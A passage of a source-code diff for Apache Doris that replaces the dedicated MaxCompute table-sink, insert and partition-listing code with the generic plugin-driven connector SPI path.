org.apache.doris.datasource.iceberg.IcebergExternalDatabase; import org.apache.doris.datasource.iceberg.IcebergExternalTable; import org.apache.doris.datasource.iceberg.IcebergUtils; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalDatabase; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; import org.apache.doris.dictionary.Dictionary; import org.apache.doris.nereids.CascadesContext; import org.apache.doris.nereids.StatementContext; @@ -53,7 +51,6 @@ import org.apache.doris.nereids.analyzer.UnboundDictionarySink; import org.apache.doris.nereids.analyzer.UnboundHiveTableSink; import org.apache.doris.nereids.analyzer.UnboundIcebergTableSink; -import org.apache.doris.nereids.analyzer.UnboundMaxComputeTableSink; import org.apache.doris.nereids.analyzer.UnboundSlot; import org.apache.doris.nereids.analyzer.UnboundTVFTableSink; import org.apache.doris.nereids.analyzer.UnboundTableSink; @@ -86,7 +83,6 @@ import org.apache.doris.nereids.trees.plans.logical.LogicalEmptyRelation; import org.apache.doris.nereids.trees.plans.logical.LogicalHiveTableSink; import org.apache.doris.nereids.trees.plans.logical.LogicalIcebergTableSink; -import org.apache.doris.nereids.trees.plans.logical.LogicalMaxComputeTableSink; import org.apache.doris.nereids.trees.plans.logical.LogicalOlapScan; import org.apache.doris.nereids.trees.plans.logical.LogicalOlapTableSink; import org.apache.doris.nereids.trees.plans.logical.LogicalOneRowRelation; @@ -108,6 +104,7 @@ import org.apache.doris.qe.SessionVariable; import org.apache.doris.thrift.TPartialUpdateNewRowPolicy; +import com.google.common.annotations.VisibleForTesting; import com.google.common.base.Preconditions; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableListMultimap; @@ -166,8 +163,6 @@ public List buildRules() { RuleType.BINDING_INSERT_HIVE_TABLE.build(unboundHiveTableSink().thenApply(this::bindHiveTableSink)), RuleType.BINDING_INSERT_ICEBERG_TABLE.build( unboundIcebergTableSink().thenApply(this::bindIcebergTableSink)), - RuleType.BINDING_INSERT_MAX_COMPUTE_TABLE.build( - unboundMaxComputeTableSink().thenApply(this::bindMaxComputeTableSink)), RuleType.BINDING_INSERT_CONNECTOR_TABLE.build( unboundConnectorTableSink().thenApply(this::bindConnectorTableSink)), RuleType.BINDING_INSERT_DICTIONARY_TABLE @@ -864,53 +859,6 @@ private void validateStaticPartition(UnboundIcebergTableSink sink, IcebergExt } } - private Plan bindMaxComputeTableSink(MatchingContext> ctx) { - UnboundMaxComputeTableSink sink = ctx.root; - Pair pair = bind(ctx.cascadesContext, sink); - MaxComputeExternalDatabase database = pair.first; - MaxComputeExternalTable table = pair.second; - LogicalPlan child = ((LogicalPlan) sink.child()); - - Map staticPartitions = sink.getStaticPartitionKeyValues(); - Set staticPartitionColNames = staticPartitions != null - ? staticPartitions.keySet() - : Sets.newHashSet(); - - List bindColumns; - if (sink.getColNames().isEmpty()) { - bindColumns = table.getBaseSchema(true).stream() - .filter(col -> !staticPartitionColNames.contains(col.getName())) - .collect(ImmutableList.toImmutableList()); - } else { - bindColumns = sink.getColNames().stream().map(cn -> { - Column column = table.getColumn(cn); - if (column == null) { - throw new AnalysisException(String.format("column %s is not found in table %s", - cn, table.getName())); - } - return column; - }).collect(ImmutableList.toImmutableList()); - } - LogicalMaxComputeTableSink boundSink = new LogicalMaxComputeTableSink<>( - database, - table, - bindColumns, - child.getOutput().stream() - .map(NamedExpression.class::cast) - .collect(ImmutableList.toImmutableList()), - sink.getDMLCommandType(), - Optional.empty(), - Optional.empty(), - child); - if (boundSink.getCols().size() != child.getOutput().size()) { - throw new AnalysisException("insert into cols should be corresponding to the query output"); - } - Map columnToOutput = getColumnToOutput(ctx, table, false, - boundSink, child); - LogicalProject fullOutputProject = getOutputProjectByCoercion(table.getFullSchema(), child, columnToOutput); - return boundSink.withChildAndUpdateOutput(fullOutputProject); - } - private Plan bindConnectorTableSink(MatchingContext> ctx) { UnboundConnectorTableSink sink = ctx.root; Pair pair = bind(ctx.cascadesContext, sink); @@ -918,19 +866,15 @@ private Plan bindConnectorTableSink(MatchingContext bindColumns; - if (sink.getColNames().isEmpty()) { - bindColumns = table.getBaseSchema(true).stream().collect(ImmutableList.toImmutableList()); - } else { - bindColumns = sink.getColNames().stream().map(cn -> { - Column column = table.getColumn(cn); - if (column == null) { - throw new AnalysisException(String.format("column %s is not found in table %s", - cn, table.getName())); - } - return column; - }).collect(ImmutableList.toImmutableList()); - } + // Static-partition columns (e.g. MaxCompute `PARTITION(pt='x')`) carry their value via the + // static partition spec rather than the query output, so they are excluded from the bound + // columns when no explicit column list is given (mirrors legacy bindMaxComputeTableSink). + Map staticPartitions = sink.getStaticPartitionKeyValues(); + Set staticPartitionColNames = staticPartitions != null + ? staticPartitions.keySet() + : Sets.newHashSet(); + + List bindColumns = selectConnectorSinkBindColumns(table, sink.getColNames(), staticPartitionColNames); LogicalConnectorTableSink boundSink = new LogicalConnectorTableSink<>( database, table, @@ -945,16 +889,53 @@ private Plan bindConnectorTableSink(MatchingContext columnToOutput = getColumnToOutput(ctx, table, false, boundSink, child); + LogicalProject fullOutputProject = + getOutputProjectByCoercion(table.getFullSchema(), child, columnToOutput); + return boundSink.withChildAndUpdateOutput(fullOutputProject); + } + // Name-mapped connector tables (JDBC / ES): keep columns in user-specified order because the + // INSERT SQL column list is built from cols (user order) and the data values must match; only + // project user-specified columns in user order. Map columnToOutput = getConnectorColumnToOutput(bindColumns, child); LogicalProject outputProject = getOutputProjectByCoercion(bindColumns, child, columnToOutput); return boundSink.withChildAndUpdateOutput(outputProject); } + /** + * Selects the bound columns for a connector table sink. With an explicit column list, binds those + * columns in user order. Without one, binds the full base schema minus any static partition columns + * (their value comes from the static partition spec, not the query output, so they must not be + * matched against the query columns) — mirrors legacy {@code bindMaxComputeTableSink}. + */ + @VisibleForTesting + static List selectConnectorSinkBindColumns(PluginDrivenExternalTable table, + List colNames, Set staticPartitionColNames) { + if (colNames.isEmpty()) { + return table.getBaseSchema(true).stream() + .filter(col -> !staticPartitionColNames.contains(col.getName())) + .collect(ImmutableList.toImmutableList()); + } + return colNames.stream().map(cn -> { + Column column = table.getColumn(cn); + if (column == null) { + throw new AnalysisException(String.format("column %s is not found in table %s", + cn, table.getName())); + } + return column; + }).collect(ImmutableList.toImmutableList()); + } + /** * Build column-to-output mapping for connector table sinks. * Maps each user-specified column to the corresponding child output expression @@ -1079,18 +1060,6 @@ private Pair bind(CascadesContext throw new AnalysisException("the target table of insert into is not an iceberg table"); } - private Pair bind(CascadesContext cascadesContext, - UnboundMaxComputeTableSink sink) { - List tableQualifier = RelationUtil.getQualifierName(cascadesContext.getConnectContext(), - sink.getNameParts()); - Pair, TableIf> pair = RelationUtil.getDbAndTable(tableQualifier, - cascadesContext.getConnectContext().getEnv(), Optional.empty()); - if (pair.second instanceof MaxComputeExternalTable) { - return Pair.of(((MaxComputeExternalDatabase) pair.first), (MaxComputeExternalTable) pair.second); - } - throw new AnalysisException("the target table of insert into is not a MaxCompute table"); - } - @SuppressWarnings("rawtypes") private Pair bind(CascadesContext cascadesContext, UnboundConnectorTableSink sink) { diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/expression/ExpressionRewrite.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/expression/ExpressionRewrite.java index 54b2b9a3395aff..60d9d704a76d64 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/expression/ExpressionRewrite.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/expression/ExpressionRewrite.java @@ -110,7 +110,6 @@ public List buildRules() { new LogicalFileSinkRewrite().build(), new LogicalHiveTableSinkRewrite().build(), new LogicalIcebergTableSinkRewrite().build(), - new LogicalMaxComputeTableSinkRewrite().build(), new LogicalIcebergMergeSinkRewrite().build(), new LogicalConnectorTableSinkRewrite().build(), new LogicalOlapTableSinkRewrite().build(), @@ -519,14 +518,6 @@ public Rule build() { } } - private class LogicalMaxComputeTableSinkRewrite extends OneRewriteRuleFactory { - @Override - public Rule build() { - return logicalMaxComputeTableSink().thenApply(ExpressionRewrite.this::applyRewriteToSink) - .toRule(RuleType.REWRITE_SINK_EXPRESSION); - } - } - private class LogicalIcebergMergeSinkRewrite extends OneRewriteRuleFactory { @Override public Rule build() { diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/implementation/LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/implementation/LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink.java deleted file mode 100644 index b73fd0e5d841da..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/implementation/LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink.java +++ /dev/null @@ -1,48 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.nereids.rules.implementation; - -import org.apache.doris.nereids.rules.Rule; -import org.apache.doris.nereids.rules.RuleType; -import org.apache.doris.nereids.trees.plans.Plan; -import org.apache.doris.nereids.trees.plans.logical.LogicalMaxComputeTableSink; -import org.apache.doris.nereids.trees.plans.physical.PhysicalMaxComputeTableSink; - -import java.util.Optional; - -/** - * Implementation rule that converts logical MaxComputeTableSink to physical MaxComputeTableSink. - */ -public class LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink extends OneImplementationRuleFactory { - @Override - public Rule build() { - return logicalMaxComputeTableSink().thenApply(ctx -> { - LogicalMaxComputeTableSink sink = ctx.root; - return new PhysicalMaxComputeTableSink<>( - sink.getDatabase(), - sink.getTargetTable(), - sink.getCols(), - sink.getOutputExprs(), - Optional.empty(), - sink.getLogicalProperties(), - null, - null, - sink.child()); - }).toRule(RuleType.LOGICAL_MAX_COMPUTE_TABLE_SINK_TO_PHYSICAL_MAX_COMPUTE_TABLE_SINK_RULE); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java index a3b4fd438db14f..703d217e74d24c 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java @@ -36,11 +36,14 @@ import org.apache.doris.common.proc.ProcResult; import org.apache.doris.common.proc.ProcService; import org.apache.doris.common.util.OrderByPair; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.datasource.CatalogIf; import org.apache.doris.datasource.ExternalTable; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.iceberg.IcebergExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.datasource.paimon.PaimonExternalCatalog; import org.apache.doris.datasource.paimon.PaimonExternalDatabase; import org.apache.doris.datasource.paimon.PaimonExternalTable; @@ -200,7 +203,7 @@ protected void validate(ConnectContext ctx) throws AnalysisException { // disallow unsupported catalog if (!(catalog.isInternalCatalog() || catalog instanceof HMSExternalCatalog - || catalog instanceof MaxComputeExternalCatalog + || catalog instanceof PluginDrivenExternalCatalog || catalog instanceof PaimonExternalCatalog)) { throw new AnalysisException(String.format("Catalog of type '%s' is not allowed in ShowPartitionsCommand", catalog.getType())); @@ -252,7 +255,8 @@ protected void analyze() throws UserException { DatabaseIf db = catalog.getDbOrAnalysisException(dbName); TableIf table = db.getTableOrMetaException(tblName, TableType.OLAP, - TableType.HMS_EXTERNAL_TABLE, TableType.MAX_COMPUTE_EXTERNAL_TABLE, TableType.PAIMON_EXTERNAL_TABLE); + TableType.HMS_EXTERNAL_TABLE, TableType.MAX_COMPUTE_EXTERNAL_TABLE, TableType.PAIMON_EXTERNAL_TABLE, + TableType.PLUGIN_EXTERNAL_TABLE); if (!catalog.isInternalCatalog()) { if (!table.isPartitionedTable()) { @@ -283,23 +287,40 @@ protected void analyze() throws UserException { } } - private ShowResultSet handleShowMaxComputeTablePartitions() { - MaxComputeExternalCatalog mcCatalog = (MaxComputeExternalCatalog) (catalog); - List> rows = new ArrayList<>(); + private ShowResultSet handleShowPluginDrivenTablePartitions() throws AnalysisException { + PluginDrivenExternalCatalog pluginCatalog = (PluginDrivenExternalCatalog) catalog; String dbName = tableName.getDb(); - List partitionNames; - if (limit < 0) { - partitionNames = mcCatalog.listPartitionNames(dbName, tableName.getTbl()); - } else { - partitionNames = mcCatalog.listPartitionNames(dbName, tableName.getTbl(), offset, limit); - } + ExternalTable dorisTable = pluginCatalog.getDbOrAnalysisException(dbName) + .getTableOrAnalysisException(tableName.getTbl()); + + // Route partition listing through the connector SPI. The SPI's + // listPartitionNames has no offset/limit, so paging is applied FE-side below. + ConnectorSession session = pluginCatalog.buildConnectorSession(); + ConnectorMetadata metadata = pluginCatalog.getConnector().getMetadata(session); + ConnectorTableHandle handle = metadata + .getTableHandle(session, dorisTable.getRemoteDbName(), dorisTable.getRemoteName()) + .orElseThrow(() -> new AnalysisException( + "table not found: " + dbName + "." + tableName.getTbl())); + List partitionNames = metadata.listPartitionNames(session, handle); + + List> rows = new ArrayList<>(); for (String partition : partitionNames) { + if (filterMap != null && !filterMap.isEmpty()) { + if (!PartitionsProcDir.filterExpression(FILTER_PARTITION_NAME, partition, filterMap)) { + continue; + } + } List list = new ArrayList<>(); list.add(partition); rows.add(list); } // sort by partition name - rows.sort(Comparator.comparing(x -> x.get(0))); + if (orderByPairs != null && orderByPairs.get(0).isDesc()) { + rows.sort(Comparator.comparing(x -> x.get(0), Comparator.reverseOrder())); + } else { + rows.sort(Comparator.comparing(x -> x.get(0))); + } + rows = applyLimit(limit, offset, rows); return new ShowResultSet(getMetaData(), rows); } @@ -412,8 +433,8 @@ protected ShowResultSet handleShowPartitions(ConnectContext ctx, StmtExecutor ex List> rows = ((PartitionsProcDir) node).fetchResultByExpressionFilter(filterMap, orderByPairs, limitElement).getRows(); return new ShowResultSet(getMetaData(), rows); - } else if (catalog instanceof MaxComputeExternalCatalog) { - return handleShowMaxComputeTablePartitions(); + } else if (catalog instanceof PluginDrivenExternalCatalog) { + return handleShowPluginDrivenTablePartitions(); } else if (catalog instanceof PaimonExternalCatalog) { return handleShowPaimonTablePartitions(); } else { diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java index 14869e7925cf86..62de597b2b0083 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java @@ -47,9 +47,9 @@ import org.apache.doris.common.util.Util; import org.apache.doris.datasource.CatalogIf; import org.apache.doris.datasource.InternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.iceberg.IcebergExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.datasource.paimon.PaimonExternalCatalog; import org.apache.doris.mysql.privilege.PrivPredicate; import org.apache.doris.nereids.CascadesContext; @@ -387,8 +387,13 @@ private void checkEngineWithCatalog() { throw new AnalysisException("Iceberg type catalog can only use `iceberg` engine."); } else if (catalog instanceof PaimonExternalCatalog && !engineName.equals(ENGINE_PAIMON)) { throw new AnalysisException("Paimon type catalog can only use `paimon` engine."); - } else if (catalog instanceof MaxComputeExternalCatalog && !engineName.equals(ENGINE_MAXCOMPUTE)) { - throw new AnalysisException("MaxCompute type catalog can only use `maxcompute` engine."); + } else if (catalog instanceof PluginDrivenExternalCatalog) { + // After the SPI cutover a max_compute catalog is a PluginDrivenExternalCatalog; mirror the + // legacy MaxComputeExternalCatalog consistency check, keyed on the connector type. + String pluginEngine = pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog); + if (pluginEngine != null && !engineName.equals(pluginEngine)) { + throw new AnalysisException("MaxCompute type catalog can only use `maxcompute` engine."); + } } } @@ -909,14 +914,35 @@ private void paddingEngineName(String ctlName, ConnectContext ctx) { engineName = ENGINE_ICEBERG; } else if (catalog instanceof PaimonExternalCatalog) { engineName = ENGINE_PAIMON; - } else if (catalog instanceof MaxComputeExternalCatalog) { - engineName = ENGINE_MAXCOMPUTE; + } else if (catalog instanceof PluginDrivenExternalCatalog + && pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog) != null) { + // After the SPI cutover a max_compute catalog is a PluginDrivenExternalCatalog; pad the + // legacy engine so the no-ENGINE CREATE TABLE keeps working (mirrors the MC branch above). + engineName = pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog); } else { throw new AnalysisException("Current catalog does not support create table: " + ctlName); } } } + /** + * Maps a PluginDriven (SPI) catalog's type to the legacy engine name used for DDL engine-padding + * and catalog-engine consistency. Keyed on {@link PluginDrivenExternalCatalog#getType()} (the + * CatalogFactory key, e.g. "max_compute"), mirroring + * {@code PluginDrivenExternalTable.getEngine()/getEngineTableTypeName()} — the two switches must + * stay in sync if SPI_READY_TYPES gains a CREATE-TABLE-capable full-adopter. Returns {@code null} + * for SPI types that do not support CREATE TABLE (jdbc/es/trino-connector) so callers preserve + * their existing (legacy-equivalent) behavior for those types. + */ + private static String pluginCatalogTypeToEngine(PluginDrivenExternalCatalog catalog) { + switch (catalog.getType()) { + case "max_compute": + return ENGINE_MAXCOMPUTE; + default: + return null; + } + } + /** * validate ctas definition */ diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertIntoTableCommand.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertIntoTableCommand.java index 907d2003515bdd..51d86798dc058c 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertIntoTableCommand.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertIntoTableCommand.java @@ -41,7 +41,6 @@ import org.apache.doris.datasource.doris.RemoteOlapTable; import org.apache.doris.datasource.hive.HMSExternalTable; import org.apache.doris.datasource.iceberg.IcebergExternalTable; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; import org.apache.doris.dictionary.Dictionary; import org.apache.doris.load.loadv2.LoadJob; import org.apache.doris.load.loadv2.LoadStatistic; @@ -49,7 +48,7 @@ import org.apache.doris.nereids.CascadesContext; import org.apache.doris.nereids.NereidsPlanner; import org.apache.doris.nereids.StatementContext; -import org.apache.doris.nereids.analyzer.UnboundMaxComputeTableSink; +import org.apache.doris.nereids.analyzer.UnboundConnectorTableSink; import org.apache.doris.nereids.analyzer.UnboundTVFRelation; import org.apache.doris.nereids.analyzer.UnboundTableSink; import org.apache.doris.nereids.exceptions.AnalysisException; @@ -78,7 +77,6 @@ import org.apache.doris.nereids.trees.plans.physical.PhysicalEmptyRelation; import org.apache.doris.nereids.trees.plans.physical.PhysicalHiveTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalIcebergTableSink; -import org.apache.doris.nereids.trees.plans.physical.PhysicalMaxComputeTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalOlapTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalSink; import org.apache.doris.nereids.trees.plans.visitor.PlanVisitor; @@ -575,44 +573,31 @@ ExecutorFactory selectInsertExecutorFactory( emptyInsert, jobId ) ); - } else if (physicalSink instanceof PhysicalMaxComputeTableSink) { + } else if (physicalSink instanceof PhysicalConnectorTableSink) { boolean emptyInsert = childIsEmptyRelation(physicalSink); - MaxComputeExternalTable mcExternalTable = (MaxComputeExternalTable) targetTableIf; - MCInsertCommandContext mcInsertCtx = insertCtx - .map(insertCommandContext -> (MCInsertCommandContext) insertCommandContext) - .orElseGet(MCInsertCommandContext::new); - if (mcInsertCtx.getStaticPartitionSpec() == null - && originLogicalQuery instanceof UnboundMaxComputeTableSink) { - UnboundMaxComputeTableSink mcSink = - (UnboundMaxComputeTableSink) originLogicalQuery; - if (mcSink.hasStaticPartition()) { + ExternalTable externalTable = (ExternalTable) targetTableIf; + PluginDrivenInsertCommandContext pluginCtx = insertCtx + .map(insertCommandContext -> (PluginDrivenInsertCommandContext) insertCommandContext) + .orElseGet(PluginDrivenInsertCommandContext::new); + if (pluginCtx.getStaticPartitionSpec().isEmpty() + && originLogicalQuery instanceof UnboundConnectorTableSink) { + UnboundConnectorTableSink pluginSink = + (UnboundConnectorTableSink) originLogicalQuery; + if (pluginSink.hasStaticPartition()) { Map staticSpec = Maps.newHashMap(); for (Map.Entry e - : mcSink.getStaticPartitionKeyValues().entrySet()) { + : pluginSink.getStaticPartitionKeyValues().entrySet()) { if (e.getValue() instanceof Literal) { staticSpec.put(e.getKey(), ((Literal) e.getValue()).getStringValue()); } } - mcInsertCtx.setStaticPartitionSpec(staticSpec); + pluginCtx.setStaticPartitionSpec(staticSpec); } } - return ExecutorFactory.from( - planner, - dataSink, - physicalSink, - () -> new MCInsertExecutor(ctx, mcExternalTable, label, planner, - Optional.of(mcInsertCtx), - emptyInsert, jobId - ) - ); - } else if (physicalSink instanceof PhysicalConnectorTableSink) { - boolean emptyInsert = childIsEmptyRelation(physicalSink); - ExternalTable externalTable = (ExternalTable) targetTableIf; return ExecutorFactory.from(planner, dataSink, physicalSink, () -> new PluginDrivenInsertExecutor(ctx, externalTable, label, planner, - Optional.of(insertCtx.orElse( - new PluginDrivenInsertCommandContext())), + Optional.of(pluginCtx), emptyInsert, jobId) ); } else if (physicalSink instanceof PhysicalDictionarySink) { diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommand.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommand.java index 7d5d0e49e77fa2..beed8b71d5bddb 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommand.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommand.java @@ -26,11 +26,12 @@ import org.apache.doris.common.ErrorReport; import org.apache.doris.common.UserException; import org.apache.doris.common.util.InternalDatabaseUtil; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalTable; import org.apache.doris.datasource.doris.RemoteDorisExternalTable; import org.apache.doris.datasource.doris.RemoteOlapTable; import org.apache.doris.datasource.hive.HMSExternalTable; import org.apache.doris.datasource.iceberg.IcebergExternalTable; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; import org.apache.doris.insertoverwrite.AbstractInsertOverwriteManager; import org.apache.doris.insertoverwrite.InsertOverwriteUtil; import org.apache.doris.insertoverwrite.RemoteInsertOverwriteManager; @@ -39,9 +40,9 @@ import org.apache.doris.nereids.CascadesContext; import org.apache.doris.nereids.NereidsPlanner; import org.apache.doris.nereids.StatementContext; +import org.apache.doris.nereids.analyzer.UnboundConnectorTableSink; import org.apache.doris.nereids.analyzer.UnboundHiveTableSink; import org.apache.doris.nereids.analyzer.UnboundIcebergTableSink; -import org.apache.doris.nereids.analyzer.UnboundMaxComputeTableSink; import org.apache.doris.nereids.analyzer.UnboundTableSink; import org.apache.doris.nereids.analyzer.UnboundTableSinkCreator; import org.apache.doris.nereids.exceptions.AnalysisException; @@ -140,7 +141,8 @@ public void run(ConnectContext ctx, StmtExecutor executor) throws Exception { TableIf targetTableIf = InsertUtils.getTargetTable(originLogicalQuery, ctx); // check allow insert overwrite if (!allowInsertOverwrite(targetTableIf)) { - String errMsg = "insert into overwrite only support OLAP/Remote OLAP and HMS/ICEBERG table." + String errMsg = "insert into overwrite only support OLAP/Remote OLAP table and external" + + " tables (HMS/Iceberg, or a plugin-driven connector that supports overwrite)." + " But current table type is " + targetTableIf.getType(); LOG.error(errMsg); throw new AnalysisException(errMsg); @@ -317,10 +319,24 @@ private boolean allowInsertOverwrite(TableIf targetTable) { } else { return targetTable instanceof HMSExternalTable || targetTable instanceof IcebergExternalTable - || targetTable instanceof MaxComputeExternalTable; + || (targetTable instanceof PluginDrivenExternalTable + && pluginConnectorSupportsInsertOverwrite((PluginDrivenExternalTable) targetTable)); } } + /** + * A plugin-driven (SPI connector) table supports INSERT OVERWRITE only if its connector + * declares the capability. Connectors that support plain INSERT but not overwrite (e.g. jdbc) + * must be rejected here so the command fails loud, rather than reaching the sink and silently + * degrading OVERWRITE to a plain append. Mirrors the connector-access pattern in + * {@code PhysicalPlanTranslator}. + */ + private static boolean pluginConnectorSupportsInsertOverwrite(PluginDrivenExternalTable table) { + PluginDrivenExternalCatalog catalog = (PluginDrivenExternalCatalog) table.getCatalog(); + return catalog.getConnector().getMetadata(catalog.buildConnectorSession()) + .supportsInsertOverwrite(); + } + private void runInsertCommand(LogicalPlan logicalQuery, InsertCommandContext insertCtx, ConnectContext ctx, StmtExecutor executor) throws Exception { InsertIntoTableCommand insertCommand = new InsertIntoTableCommand(logicalQuery, labelName, @@ -395,8 +411,8 @@ private void insertIntoPartitions(ConnectContext ctx, StmtExecutor executor, Lis ((IcebergInsertCommandContext) insertCtx).setOverwrite(true); setStaticPartitionToContext(sink, (IcebergInsertCommandContext) insertCtx); branchName.ifPresent(notUsed -> ((IcebergInsertCommandContext) insertCtx).setBranchName(branchName)); - } else if (logicalQuery instanceof UnboundMaxComputeTableSink) { - UnboundMaxComputeTableSink sink = (UnboundMaxComputeTableSink) logicalQuery; + } else if (logicalQuery instanceof UnboundConnectorTableSink) { + UnboundConnectorTableSink sink = (UnboundConnectorTableSink) logicalQuery; copySink = (UnboundLogicalSink) UnboundTableSinkCreator.createUnboundTableSink( sink.getNameParts(), sink.getColNames(), sink.getHints(), false, sink.getPartitions(), false, @@ -404,8 +420,8 @@ private void insertIntoPartitions(ConnectContext ctx, StmtExecutor executor, Lis sink.getDMLCommandType(), (LogicalPlan) (sink.child(0)), sink.getStaticPartitionKeyValues()); - MCInsertCommandContext mcCtx = new MCInsertCommandContext(); - mcCtx.setOverwrite(true); + PluginDrivenInsertCommandContext pluginCtx = new PluginDrivenInsertCommandContext(); + pluginCtx.setOverwrite(true); if (sink.hasStaticPartition()) { Map staticSpec = Maps.newHashMap(); for (Map.Entry e : sink.getStaticPartitionKeyValues().entrySet()) { @@ -413,9 +429,9 @@ private void insertIntoPartitions(ConnectContext ctx, StmtExecutor executor, Lis staticSpec.put(e.getKey(), ((Literal) e.getValue()).getStringValue()); } } - mcCtx.setStaticPartitionSpec(staticSpec); + pluginCtx.setStaticPartitionSpec(staticSpec); } - insertCtx = mcCtx; + insertCtx = pluginCtx; } else { throw new UserException("Current catalog does not support insert overwrite yet."); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertUtils.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertUtils.java index fa5e34046d1c80..2ab263e03d2e8f 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertUtils.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertUtils.java @@ -41,7 +41,6 @@ import org.apache.doris.nereids.analyzer.UnboundHiveTableSink; import org.apache.doris.nereids.analyzer.UnboundIcebergTableSink; import org.apache.doris.nereids.analyzer.UnboundInlineTable; -import org.apache.doris.nereids.analyzer.UnboundMaxComputeTableSink; import org.apache.doris.nereids.analyzer.UnboundSlot; import org.apache.doris.nereids.analyzer.UnboundStar; import org.apache.doris.nereids.analyzer.UnboundTableSink; @@ -377,8 +376,8 @@ private static Plan normalizePlanWithoutLock(LogicalPlan plan, TableIf table, Map staticPartitions = null; if (unboundLogicalSink instanceof UnboundIcebergTableSink) { staticPartitions = ((UnboundIcebergTableSink) unboundLogicalSink).getStaticPartitionKeyValues(); - } else if (unboundLogicalSink instanceof UnboundMaxComputeTableSink) { - staticPartitions = ((UnboundMaxComputeTableSink) unboundLogicalSink).getStaticPartitionKeyValues(); + } else if (unboundLogicalSink instanceof UnboundConnectorTableSink) { + staticPartitions = ((UnboundConnectorTableSink) unboundLogicalSink).getStaticPartitionKeyValues(); } if (staticPartitions != null && !staticPartitions.isEmpty() && CollectionUtils.isEmpty(unboundLogicalSink.getColNames())) { @@ -604,8 +603,6 @@ public static List getTargetTableQualified(Plan plan, ConnectContext ctx unboundTableSink = (UnboundDictionarySink) plan; } else if (plan instanceof UnboundBlackholeSink) { unboundTableSink = (UnboundBlackholeSink) plan; - } else if (plan instanceof UnboundMaxComputeTableSink) { - unboundTableSink = (UnboundMaxComputeTableSink) plan; } else if (plan instanceof UnboundConnectorTableSink) { unboundTableSink = (UnboundConnectorTableSink) plan; } else { diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertCommandContext.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertCommandContext.java deleted file mode 100644 index 0eb693e4480f24..00000000000000 --- 